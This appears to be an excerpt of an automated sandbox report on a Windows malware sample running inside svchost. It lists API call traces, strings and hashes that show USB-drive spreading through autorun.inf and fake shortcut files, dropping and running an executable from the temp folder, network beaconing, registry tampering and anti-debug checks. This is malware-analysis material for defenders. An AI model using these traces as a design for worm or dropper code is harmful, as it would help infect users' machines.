wsprintfW.USER32 ref: 001E1EB4
FindFirstFileW.KERNEL32(?,?), ref: 001E1EC7
wsprintfW.USER32 ref: 001E1FC0
wsprintfW.USER32 ref: 001E1FD6
MoveFileExW.KERNEL32(?,?,00000001), ref: 001E1FEB
wsprintfW.USER32 ref: 001E2113
wsprintfW.USER32 ref: 001E2129
MoveFileExW.KERNEL32(?,?,00000001), ref: 001E213E
FindNextFileW.KERNEL32(?,?), ref: 001E2167
FindClose.KERNEL32(?), ref: 001E217C

Strings

Thumbs.db, xrefs: 001E2045
%s\*, xrefs: 001E1EA8
autorun.inf, xrefs: 001E2083
LaunchU3.exe, xrefs: 001E20C3
%s\%s, xrefs: 001E1FBA, 001E1FD0, 001E210D, 001E2123
desktop.ini, xrefs: 001E200D

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: wsprintf$File$Find$Move$CloseFirstNext
String ID: %s\%s$%s\*$LaunchU3.exe$Thumbs.db$autorun.inf$desktop.ini
API String ID: 1843404858-2655799986
Opcode ID: ab32bf8fabbe7d9597738632f04ac3e8965f54e1f8576f1a3d3eaf0689f9a5ba
Instruction ID: 906cb91f4e5cc51432071a64cb1321b662a276caff4dec06c5186d9bd6d15037
Opcode Fuzzy Hash: ab32bf8fabbe7d9597738632f04ac3e8965f54e1f8576f1a3d3eaf0689f9a5ba
Instruction Fuzzy Hash: 58813371500985AADB20EB62CC41AFE737EBF34760F8906A4E92697190F332EF85C640

Uniqueness

Uniqueness Score: -1.00%

Function 00022B45 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 114memoryfileprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 00021535: lstrlen.KERNEL32(00000000), ref: 00021552
Part of subcall function 00021535: RtlAllocateHeap.NTDLL(00000000,00000001,00000000), ref: 00021569
Part of subcall function 00021535: lstrcpy.KERNEL32(00000000,00000000), ref: 0002158C
Part of subcall function 00021535: socket.WS2_32(00000002,00000001,00000006), ref: 00021610
Part of subcall function 00021535: connect.WS2_32(?,00000002,00000010), ref: 0002162A
Part of subcall function 00021535: RtlAllocateHeap.NTDLL(00000008,00000401,00000002), ref: 00021644
Part of subcall function 00021535: wsprintfA.USER32 ref: 0002166B
Part of subcall function 00021535: send.WS2_32(?,00000000,00000000,00000000), ref: 00021694
Part of subcall function 00021535: send.WS2_32(?,00000000,00000020,00000000), ref: 000216AA
Part of subcall function 00021535: recv.WS2_32(?,00000000,00000400,00000002), ref: 000216BC

NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00022B90
VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,?,00000000,00000000,00000001), ref: 00022BCD
ExpandEnvironmentStringsW.KERNEL32(%tmp%\,?,00008000,00000000,00008000,00001000,00000004,?,00000000,00000000,00000001), ref: 00022BEA
GetTickCount.KERNEL32(%tmp%\,?,00008000,00000000,00008000,00001000,00000004,?,00000000,00000000,00000001), ref: 00022BF9
wsprintfW.USER32 ref: 00022C05
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 00022C1F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00022C3F
CloseHandle.KERNEL32(?), ref: 00022C47
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00022C73
CloseHandle.KERNEL32(?), ref: 00022C7F
CloseHandle.KERNEL32(?), ref: 00022C87
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001), ref: 00022C9D
HeapFree.KERNEL32(00000000,?,00000000), ref: 00022CAD

Strings

%08x.exe, xrefs: 00022BFF
D, xrefs: 00022C58
%tmp%\, xrefs: 00022BE5

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: CloseHandleHeap$AllocateCreateFileFreeVirtualsendwsprintf$AllocCountDelayEnvironmentExecutionExpandProcessStringsTickWriteconnectlstrcpylstrlenrecvsocket
String ID: %08x.exe$%tmp%\$D
API String ID: 4146496662-4221817291
Opcode ID: b8adfce02eb7df874292e9fff201d095f24c3800ae23e2d159d7e0337afc0749
Instruction ID: 5885b649af8c529f80e8f4598fd1534c47060ca609640f73fa911d5f00115102
Opcode Fuzzy Hash: b8adfce02eb7df874292e9fff201d095f24c3800ae23e2d159d7e0337afc0749
Instruction Fuzzy Hash: AE414170900329BAEF61AFE0ED02FEEBAB5BF00710F204164B6117A1E2DBB55A54DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00022CBA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 135memorystringnativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00022D62
HeapFree.KERNEL32(00000000,?,00000004), ref: 00022D8F

Part of subcall function 00021CE9: VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00021D04
Part of subcall function 00021CE9: lstrcpy.KERNEL32(?,software\microsoft), ref: 00021D1C
Part of subcall function 00021CE9: RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,software\microsoft,00000000,00008000,00001000,00000004), ref: 00021D3A
Part of subcall function 00021CE9: RegEnumValueW.ADVAPI32(?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00021D5B
Part of subcall function 00021CE9: RegDeleteValueW.ADVAPI32(?,?,?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000), ref: 00021D71
Part of subcall function 00021CE9: RegCloseKey.ADVAPI32(?,?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000,?), ref: 00021D7B
Part of subcall function 00021CE9: lstrcpy.KERNEL32(?,?), ref: 00021D89
Part of subcall function 00021CE9: RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000,00000000,0002001F,00000000,?), ref: 00021DA7
Part of subcall function 00021CE9: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(D:(A;;KA;;;WD),00000001,00022D23,00000000), ref: 00021DC1
Part of subcall function 00021CE9: RegSetKeySecurity.ADVAPI32(?,00000004,00022D23,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000,00000000), ref: 00021DCE
Part of subcall function 00021CE9: RegCloseKey.ADVAPI32(?,?,00000004,00022D23,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000), ref: 00021DD6
Part of subcall function 00021CE9: RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,?,00000004,00022D23,?,00000000,00000000,00000000), ref: 00021DF4

RtlAllocateHeap.NTDLL(00000000,00000100,?), ref: 00022DD7
wsprintfA.USER32 ref: 00022DF3
RtlAllocateHeap.NTDLL(00000000,00000000,00020454), ref: 00022E1B
lstrlen.KERNEL32(?,?,?,00000001,00000000,00000000,00020454,00000020,?,00000001,00000100,?,?,?,?), ref: 00022E38
HeapFree.KERNEL32(00000000,?,?), ref: 00022E59
HeapFree.KERNEL32(00000000,?,00000000), ref: 00022E69
ExitProcess.KERNEL32(00000000,00000000,?,00000000,00000000,00020454,00000020,?,00000001,00000100,?,?,?,?), ref: 00022E76

Strings

id:%lu|tid:%lu|result:%lu, xrefs: 00022DEB

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: Heap$CreateFreeSecurity$AllocateCloseDescriptorValuelstrcpy$AllocConvertDelayDeleteEnumExecutionExitProcessStringVirtuallstrlenwsprintf
String ID: id:%lu|tid:%lu|result:%lu
API String ID: 363709119-2667831514
Opcode ID: d25e3c9916497819a3f6f360782b5fd7bcca9f923f3f8a78d58072fed458c023
Instruction ID: 4d733a3a282c010e36a280ad8aa10931b2d313d0ec136ca377ee90bd45d2e22f
Opcode Fuzzy Hash: d25e3c9916497819a3f6f360782b5fd7bcca9f923f3f8a78d58072fed458c023
Instruction Fuzzy Hash: 8151077180022AFEDF61AFE4EC46BEEBBB5BF14300F104066F611750A2D7798A50EB65

Uniqueness

Uniqueness Score: -1.00%

Function 001E1B70 Relevance: 16.7, APIs: 11, Instructions: 232fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,750BF119,?,?), ref: 001E1C31
FindNextFileW.KERNEL32(00000000,?,?,?), ref: 001E1C78

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 86d5251667b6a28160473c7bbb115f2062870121a3a4e44fd48f104b4d4e0cb6
Instruction ID: 2229d15873242f85dfec415792582947ea867989e2e1e2ca5ddd33cc57e2dda0
Opcode Fuzzy Hash: 86d5251667b6a28160473c7bbb115f2062870121a3a4e44fd48f104b4d4e0cb6
Instruction Fuzzy Hash: BD8114319005599BCB24AFA9CC457FE73B6FFA4360F5446A4ED0ACB290E7319E91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001E2D41 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 001E3439
SetUnhandledExceptionFilter.KERNEL32 ref: 001E344E
UnhandledExceptionFilter.KERNEL32(001E9250), ref: 001E3459
GetCurrentProcess.KERNEL32(C0000409), ref: 001E3475
TerminateProcess.KERNEL32(00000000), ref: 001E347C

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: faab27382bc7f5e2fac9fdfdb669a130c37e001037dc33a816f8df33481041fd
Instruction ID: 8f6d5e5780a839239a139e646b0f7ae7d87f2c225a55ac15a0e385b5a3efd011
Opcode Fuzzy Hash: faab27382bc7f5e2fac9fdfdb669a130c37e001037dc33a816f8df33481041fd
Instruction Fuzzy Hash: 2121BCB4802290DBDB90DFE5EDC5A5C3BE8BB48318F50441AF5098FA72E77569C0CB45

Uniqueness

Uniqueness Score: -1.00%

Function 001E2528 Relevance: 79.1, APIs: 39, Strings: 6, Instructions: 309fileregistrymemoryCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 001E2571
DeleteFileW.KERNEL32(?), ref: 001E2583
SetFileAttributesW.KERNEL32(?,00000080), ref: 001E2595
DeleteFileW.KERNEL32(?), ref: 001E25A2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000007,00000000), ref: 001E25BA
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 001E25D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 001E25E2
CloseHandle.KERNEL32(00000000), ref: 001E25E9
RegQueryValueExW.ADVAPI32 ref: 001E2618
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 001E2631
RegQueryValueExW.ADVAPI32(?,DOS_STUB,00000000,00000000,00000000,00000000), ref: 001E2659
_rand.LIBCMT ref: 001E2539

Part of subcall function 001E2F58: __getptd.LIBCMT ref: 001E2F58

_rand.LIBCMT ref: 001E2685
VirtualAlloc.KERNEL32(00000000,00000001,00001000,00000004), ref: 001E26A6
_memset.LIBCMT ref: 001E26B9
wsprintfW.USER32 ref: 001E26D4
DeleteFileW.KERNEL32(?), ref: 001E26E6
SetFileAttributesW.KERNEL32(?,00000080), ref: 001E26F8
DeleteFileW.KERNEL32(?), ref: 001E2705
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000007,00000000), ref: 001E271D
WriteFile.KERNEL32(00000000,?,00000001,?,00000000), ref: 001E2737
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 001E274F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 001E2763
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 001E276D
CloseHandle.KERNEL32(00000000), ref: 001E2770
RegQueryValueExW.ADVAPI32(?,ImageBase,00000000,00000000,00000000,00000000), ref: 001E27A5
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 001E27BE
RegQueryValueExW.ADVAPI32(?,ImageBase,00000000,00000000,00000000,00000000), ref: 001E27E6
wsprintfW.USER32 ref: 001E27FB
DeleteFileW.KERNEL32(?,00000000,00000000,?), ref: 001E280D
SetFileAttributesW.KERNEL32(?,00000080), ref: 001E281F
DeleteFileW.KERNEL32(?), ref: 001E282C
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000007,00000000), ref: 001E2844
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 001E285E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 001E286C
CloseHandle.KERNEL32(00000000), ref: 001E2873
RegCloseKey.ADVAPI32(?), ref: 001E2880
wsprintfW.USER32 ref: 001E28CE
wsprintfW.USER32 ref: 001E2901

Strings

%s\~$W%s.FAT, xrefs: 001E256B
DOS_STUB, xrefs: 001E2608, 001E2653
%s\Removable Disk (%I64uGB).lnk, xrefs: 001E28FB
ImageBase, xrefs: 001E2795, 001E27E0
%s\desktop.ini, xrefs: 001E26CE
%s\Thumbs.db, xrefs: 001E27F5

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: File$Virtual$Delete$wsprintf$CloseFreeQueryValueWrite$AllocAttributesCreateHandle$_rand$__getptd_memset
String ID: %s\Removable Disk (%I64uGB).lnk$%s\Thumbs.db$%s\desktop.ini$%s\~$W%s.FAT$DOS_STUB$ImageBase
API String ID: 3531569036-3179335881
Opcode ID: 878affd53dbddeca07af37a2e962edfd50ca80ce4baab6d7086779a4b1d4dc65
Instruction ID: a0cbaf8dcc6da57c826e4db33383138a997d16ba37f4e7c6b159b017f1a7cdef
Opcode Fuzzy Hash: 878affd53dbddeca07af37a2e962edfd50ca80ce4baab6d7086779a4b1d4dc65
Instruction Fuzzy Hash: 99B172B1A40758ABDB34DBA1DC99FEE777CAF54700F404584F609AA180DAB1AE84CF64

Uniqueness

Uniqueness Score: -1.00%

Function 001E442D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4435
__mtterm.LIBCMT ref: 001E4441

Part of subcall function 001E410C: DecodePointer.KERNEL32(00000003,001E31ED,001E31D3,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E411D
Part of subcall function 001E410C: TlsFree.KERNEL32(0000001A,001E31ED,001E31D3,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4137
Part of subcall function 001E410C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,001E31ED,001E31D3,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E6668
Part of subcall function 001E410C: _free.LIBCMT ref: 001E666B
Part of subcall function 001E410C: DeleteCriticalSection.KERNEL32(0000001A,?,?,001E31ED,001E31D3,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E6692

GetProcAddress.KERNEL32(00000000,FlsAlloc,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4457
GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4464
GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4471
GetProcAddress.KERNEL32(00000000,FlsFree,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E447E
TlsAlloc.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E44CE
TlsSetValue.KERNEL32(00000000,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E44E9
__init_pointers.LIBCMT ref: 001E44F3
EncodePointer.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4504
EncodePointer.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E4511
EncodePointer.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E451E
EncodePointer.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E452B
DecodePointer.KERNEL32(Function_00004290,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E454C
__calloc_crt.LIBCMT ref: 001E4561
DecodePointer.KERNEL32(00000000,?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E457B
GetCurrentThreadId.KERNEL32(?,?,001E312A,001EB100,00000008,001E32BE,?,?,?,001EB120,0000000C,001E3379,?), ref: 001E458D

Strings

FlsFree, xrefs: 001E4473
KERNEL32.DLL, xrefs: 001E4430
FlsGetValue, xrefs: 001E4459
FlsAlloc, xrefs: 001E4451
FlsSetValue, xrefs: 001E4466

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 840a4098ebebfe11d3f4458dfb944d17afaed95ee1e87cd3b4aaf04abfec8d0a
Instruction ID: f173f9f5275e82815425cdd6f10f8d8052b25aca1d5de320daa002fa4c6e32eb
Opcode Fuzzy Hash: 840a4098ebebfe11d3f4458dfb944d17afaed95ee1e87cd3b4aaf04abfec8d0a
Instruction Fuzzy Hash: D6316271900BE19BDB20AFF6AD89A4D3FE4AB5C7207240916F4189BAB0DF70A4C1CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001E8356 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001E40C6: RtlEncodePointer.NTDLL(00000000,001E837C,001EEF00,00000314,00000000,?,?,?,?,?,001E7A4F,001EEF00,Microsoft Visual C++ Runtime Library,00012010), ref: 001E40C8

LoadLibraryW.KERNEL32(USER32.DLL,001EEF00,00000314,00000000), ref: 001E8391
GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 001E83AD
EncodePointer.KERNEL32(00000000), ref: 001E83BE
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 001E83CB
EncodePointer.KERNEL32(00000000), ref: 001E83CE
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 001E83DB
EncodePointer.KERNEL32(00000000), ref: 001E83DE
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 001E83EB
EncodePointer.KERNEL32(00000000), ref: 001E83EE
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 001E83FF
EncodePointer.KERNEL32(00000000), ref: 001E8402
DecodePointer.KERNEL32(?,001EEF00,00000314,00000000), ref: 001E8424
DecodePointer.KERNEL32 ref: 001E842E
DecodePointer.KERNEL32(?,001EEF00,00000314,00000000), ref: 001E846D
DecodePointer.KERNEL32(?), ref: 001E8487
DecodePointer.KERNEL32(001EEF00,00000314,00000000), ref: 001E849B

Strings

USER32.DLL, xrefs: 001E838C
GetProcessWindowStation, xrefs: 001E83F9
GetLastActivePopup, xrefs: 001E83D0
GetActiveWindow, xrefs: 001E83C0
MessageBoxW, xrefs: 001E83A7
GetUserObjectInformationW, xrefs: 001E83E0

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: Pointer$Encode$AddressDecodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 1951731885-564504941
Opcode ID: 49b6e680087740f1b7c30df360f08562897658f1ac3377b78e195aae1240b24a
Instruction ID: ba9ac9d3a2ccf14b1aaf537a22496dd56693754792234b6044669f441b15e2fb
Opcode Fuzzy Hash: 49b6e680087740f1b7c30df360f08562897658f1ac3377b78e195aae1240b24a
Instruction Fuzzy Hash: 46412C7190179BAACF20DFF69D85A6E7BA8EF84300F550429E909E7190EB74D941CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00021CE9 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 125registrystringmemoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00021D04
lstrcpy.KERNEL32(?,software\microsoft), ref: 00021D1C
RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,software\microsoft,00000000,00008000,00001000,00000004), ref: 00021D3A
RegEnumValueW.ADVAPI32(?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00021D5B
RegDeleteValueW.ADVAPI32(?,?,?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000), ref: 00021D71
RegCloseKey.ADVAPI32(?,?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000,?), ref: 00021D7B
lstrcpy.KERNEL32(?,?), ref: 00021D89
RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000,00000000,0002001F,00000000,?), ref: 00021DA7
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(D:(A;;KA;;;WD),00000001,00022D23,00000000), ref: 00021DC1
RegSetKeySecurity.ADVAPI32(?,00000004,00022D23,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000,00000000), ref: 00021DCE
RegCloseKey.ADVAPI32(?,?,00000004,00022D23,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000), ref: 00021DD6
RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,?,00000004,00022D23,?,00000000,00000000,00000000), ref: 00021DF4
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00008000,?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,?,00000004), ref: 00021E18
RegDeleteValueW.ADVAPI32(?,?,00000000,00000000,?,00008000,?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,?), ref: 00021E26
RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,00008000,?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?), ref: 00021E39
CloseHandle.KERNEL32(?), ref: 00021E44
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000,00000000,?,00008000,?,00000000,00000000,00000000,0002001F,00000000,?), ref: 00021E51
DeleteFileW.KERNEL32(?,?,00000080,?,?,?,00000000,00000000,?,00008000,?,00000000,00000000,00000000,0002001F,00000000), ref: 00021E59
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000,00000000), ref: 00021E68

Strings

D:(A;;KA;;;WD), xrefs: 00021DBC
software\microsoft, xrefs: 00021D14

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: CloseValue$CreateDeleteSecurity$DescriptorFileVirtuallstrcpy$AllocAttributesConvertEnumFreeHandleQueryString
String ID: D:(A;;KA;;;WD)$software\microsoft
API String ID: 2404269020-2933255985
Opcode ID: b1836ad5dda5fe3f68145f66cd1a53c925db323f158cb1440ff89ee1a73d0fe1
Instruction ID: fd3e399d17c46af67c1413c994a177e2eca4e8ac3beefc90bf2e484501139d44
Opcode Fuzzy Hash: b1836ad5dda5fe3f68145f66cd1a53c925db323f158cb1440ff89ee1a73d0fe1
Instruction Fuzzy Hash: 08411271950118BEFF65ABD0ED47FEEBA79EB14700F204164B610740A2EBB56F24AB24

Uniqueness

Uniqueness Score: -1.00%

Function 0002271E Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 123registrystringprocessCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00022741
lstrcpy.KERNEL32(00022DB2,software\microsoft), ref: 0002275B
RegOpenKeyExA.ADVAPI32(00022DB2,00000000,0002001F,?,00022DB2,software\microsoft,00000000,00008000,00001000,00000004), ref: 00022774
RegEnumValueW.ADVAPI32(?,00000000,?,0000001F,00000000,00000000,00000000,00000000,00022DB2,00000000,0002001F,?,00022DB2,software\microsoft,00000000,00008000), ref: 000227A7
RegDeleteValueW.ADVAPI32(?,?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,?,00000000,?,0000001F,00000000,00000000), ref: 000227C4
RegCloseKey.ADVAPI32(?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,00022DB2,00000000,0002001F,?,00022DB2,software\microsoft,00000000), ref: 000227D5
lstrcpy.KERNEL32(00022DB2,?), ref: 000227E9
RegOpenKeyExA.ADVAPI32(00022DB2,00000000,00020019,?,00022DB2,?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,00022DB2,00000000), ref: 00022802
lstrcpyW.KERNEL32(00022DB2,00022DB2), ref: 0002281E
RegQueryValueExW.ADVAPI32(?,00022DB2,00000000,00000000,00022DB2,00008000,00000000,00020019,?,00022DB2,?,?,00000000,?,0000001F,00000000), ref: 0002283B
RegCloseKey.ADVAPI32(?,?,00022DB2,00000000,00000000,00022DB2,00008000,00000000,00020019,?,00022DB2,?,?,00000000,?,0000001F), ref: 00022843
CreateProcessW.KERNEL32(00000000,00022DB2,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00022870
CloseHandle.KERNEL32(00000000), ref: 0002287F
ResumeThread.KERNEL32(?,00000000,00022DB2,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,00022DB2,00000000,00000000), ref: 00022887
CloseHandle.KERNEL32(?), ref: 0002288F
CloseHandle.KERNEL32(?), ref: 00022897
VirtualFree.KERNEL32(00022DB2,00000000,00008000,00022DB2,00000000,0002001F,?,00022DB2,software\microsoft,00000000,00008000,00001000,00000004), ref: 000228AD

Strings

D, xrefs: 00022854
software\microsoft, xrefs: 00022751, 00022757

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: Close$HandleValuelstrcpy$OpenVirtual$AllocCreateDeleteEnumFreeProcessQueryResumeThread
String ID: D$software\microsoft
API String ID: 1501828479-114866630
Opcode ID: 152ca32bf0f47ef9c1514464321a736f10773b14d29309644bdf743d37a2e0ed
Instruction ID: f8c24cb6b35a898df1d4813da9c657cc120b58fcb0cc90411a5deb29140ecdac
Opcode Fuzzy Hash: 152ca32bf0f47ef9c1514464321a736f10773b14d29309644bdf743d37a2e0ed
Instruction Fuzzy Hash: A841F071914229BAEF61DBD0DD42FEEBBB9FF04704F200025F610B50A2DB759A54AF24

Uniqueness

Uniqueness Score: -1.00%

Function 00022601 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 85registrymemoryfileCOMMON

